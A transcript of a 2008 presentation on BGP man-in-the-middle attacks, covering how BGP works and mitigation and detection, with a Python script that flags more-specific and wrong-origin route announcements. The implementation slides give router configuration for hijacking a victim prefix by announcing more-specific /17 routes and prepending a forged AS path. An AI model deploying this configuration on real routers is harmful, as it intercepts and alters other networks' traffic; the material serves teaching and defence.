BGP Man in the Middle Attack
Jason Froehlich, December 10, 2008
Presentation Transcript
What is BGP?
  • Routing for whole Internet
  • Autonomous Systems (AS)
  • Classless Interdomain Routing (CIDR)
    • 190.100.0.0/16 = 190.100.0.0, mask 255.255.0.0
How BGP Works
  • AS Border Router - “BGP Speaker”
    • Advertise own routes, redistribute others
  • Update Messages
    • “AS_PATH” field
  • Path Selection
    • Most “Specific” Network
    • 190.100.0.0/17 over 190.100.0.0/16
The Man in the Middle Attack
  • Requirements:
    • Redirect all traffic to Attacker
    • Forward traffic onto Target
  • Relies on trust built into BGP
Attack Threats
  • Confidentiality
    • Capture all packets
  • Integrity
    • Modify packets before delivery
  • Availability
    • Black Hole
    • Filtering selected packets
Implementation
  • 190.100.0.0/16 (AS100) is Target
  • AS900 is Attacker
Implementation – Step 1
  • Advertise New Routes
  • More specific
    • 190.100.0.0/17, 190.100.128.0/17
Implementation – Step 1

  router bgp 900
   network 190.100.0.0 mask 255.255.128.0
   network 190.100.128.0 mask 255.255.128.0
   ...
   neighbor <ip address of AS600 router> remote-as 600
   neighbor <ip address of AS700 router> remote-as 700
   neighbor <ip address of AS800 router> remote-as 800
   no auto-summary

Implementation – Step 2
  • Create Route Back to Target
  • Modify “AS_PATH” field of advertisement
    • Add each AS in route to target
Implementation – Step 2

  ip prefix-list victim permit 190.100.0.0/16

  route-map mitm permit 10
   match ip address prefix-list victim
   set as-path prepend 600 300 100

  ip route 190.100.0.0 255.255.128.0 <ip address of AS600 rtr>
  ip route 190.100.128.0 255.255.128.0 <ip address of AS600 rtr>

Attack Limitations
  • Access to BGP Router
    • No script kiddies, but pool still large
  • Half of the Conversation
    • Only sees Inbound traffic
    • Resolve: 2nd BGP MITM, Other MITM (DNS)
  • Incomplete Route Distribution
    • ASes in Return Path
Attack Limitations cont.
  • Packet Route Visible
    • Traceroute
    • Resolve: TTL Modification
  • BGP Updates Visible
    • Alert a perceptive Administrator
  • Encrypted Traffic
    • Cannot decrypt payload
Mitigating the Attack - Prevention
  • Filtering
    • Must be done by every ISP
  • Internet Routing Registry
    • Overhead
    • Poor Database Maintenance / Security
Mitigating the Attack - Detection
  • Monitor for BGP Updates
  • BGPmon.net
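Added example, not from the slides: a small check a network operator could run over the updates a route monitor delivers, using the prefix and AS numbers from the Implementation slides. Because path selection prefers the most specific network, and because the route-map above prepends 600 300 100 so that the path still ends in the legitimate AS100, an origin check alone misses the MITM announcement; the more-specific check is what catches it. The registry and the sample updates are constructed.

```python
import ipaddress

# Constructed registry: prefix -> set of ASes allowed to originate it.
# AS100 owning 190.100.0.0/16 is taken from the slides.
REGISTERED = {ipaddress.ip_network("190.100.0.0/16"): {100}}

def classify_update(prefix, as_path, registered=REGISTERED):
    """Return alert strings for one announcement (empty list if it looks benign)."""
    net = ipaddress.ip_network(prefix)
    origin = as_path[-1]          # the origin AS is the last hop of AS_PATH
    alerts = []
    for reg_net, origins in registered.items():
        if net.version != reg_net.version or not net.subnet_of(reg_net):
            continue
        # Longest match wins, so a /17 inside the /16 attracts the traffic
        # even when AS_PATH ends in the legitimate origin.
        if net.prefixlen > reg_net.prefixlen:
            alerts.append(f"more-specific {net} announced inside registered {reg_net}")
        if origin not in origins:
            alerts.append(f"unexpected origin AS{origin} for {net}")
    return alerts

def scan(updates, registered=REGISTERED):
    """Reduce a list of (prefix, as_path) updates to those that raise alerts."""
    flagged = []
    for prefix, as_path in updates:
        alerts = classify_update(prefix, as_path, registered)
        if alerts:
            flagged.append((prefix, as_path, alerts))
    return flagged

# Constructed sample updates, as a route monitor might deliver them.
SAMPLE_UPDATES = [
    ("190.100.0.0/16",   [300, 100]),            # legitimate /16 from AS100
    ("190.100.0.0/17",   [900, 600, 300, 100]),  # MITM: more specific, prepended path
    ("190.100.128.0/17", [900, 600, 300, 100]),  # second half of the /16
    ("190.100.0.0/16",   [800, 666]),            # plain origin hijack
    ("10.20.0.0/16",     [200, 50]),             # unrelated prefix, ignored
]

if __name__ == "__main__":
    for prefix, as_path, alerts in scan(SAMPLE_UPDATES):
        print(prefix, as_path, *alerts, sep="\n  ")
```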
Mitigating the Attack - Response
  • Counter-Attack
    • Advertise even more specific networks
  • ISP Disconnect Attacker
    • May take hours to days
    • Youtube.com – February 2008
Mitigating the Attack – Securing BGP
  • S-BGP
    • 2 Certificates – IP address, AS
  • Secure Origin BGP
    • Topologies
  • Interdomain Route Validation
    • Out of band verification
Conclusion

BGP Man in the Middle

  • Powerful Attack
  • Easy to Implement
  • Difficult to Mitigate